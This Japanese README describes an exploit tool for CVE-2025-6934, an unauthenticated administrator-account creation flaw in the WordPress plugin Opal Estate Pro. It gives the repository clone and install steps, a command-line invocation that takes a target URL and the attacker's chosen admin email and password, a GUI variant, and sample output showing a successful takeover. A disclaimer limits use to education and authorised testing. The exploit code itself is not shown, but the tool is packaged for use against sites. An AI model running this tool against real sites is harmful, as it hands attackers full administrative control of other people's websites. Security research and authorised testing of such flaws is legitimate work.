
CVE-2025-6934 エクスプロイトツール - WordPress プラグイン Opal Estate Pro における未認証の管理者アカウント作成
mejbankadir によって完全に作成・開発されました (SMH tech および Mejban HackSheild(NexoAmicus 傘下))
CVE-2025-6934 は、WordPress プラグイン Opal Estate Pro(バージョン <= 1.7.5)における重大な脆弱性であり、認証されていない攻撃者が脆弱な WordPress サイト上に管理者アカウントを作成することを可能にします。
このツールは、この脆弱性を悪用するための CLI(コマンドライン)版と GUI(グラフィカルユーザーインターフェース)版の両方を提供します。
| 属性 | 値 |
|---|---|
| CVE ID | CVE-2025-6934 |
| 深刻度 | 緊急 (CVSS 3.1: 9.8) |
| 影響を受けるプラグイン | Opal Estate Pro |
| 影響を受けるバージョン | <= 1.7.5 |
| 脆弱性の種類 | 未認証の管理者アカウント作成 |
| CVSS ベクトル | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
GUI の機能:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
引数:
-u, --url Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ 警告: このツールは、教育目的および許可されたセキュリティテストの目的でのみ提供されています。
コンピュータシステムへの不正アクセスは違法かつ非倫理的です。
このツールを使用することで、以下に同意したものとみなされます:
- 自分が所有する、または明示的な許可を得たシステムに対してのみテストを行うこと
- 悪意のある目的でこのツールを使用しないこと
- 法的結果に対するすべての責任を受け入れること
| 役割 | 名前 |
|---|---|
| 制作者 & 開発者 | mejbankadir |
| 組織 | SMH tech & Mejban HackSheild Under NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
このツールは SSL 警告を自動的に無効化します。問題が発生した場合:
requests.packages.urllib3.disable_warnings()
MIT ライセンス
Copyright (c) 2025 mejbankadir (SMH tech および Mejban HackSheild(NexoAmicus 傘下))
mejbankadir によって ❤️ を込めて作られました
SMH tech | Mejban HackSheild | Under NexoAmicus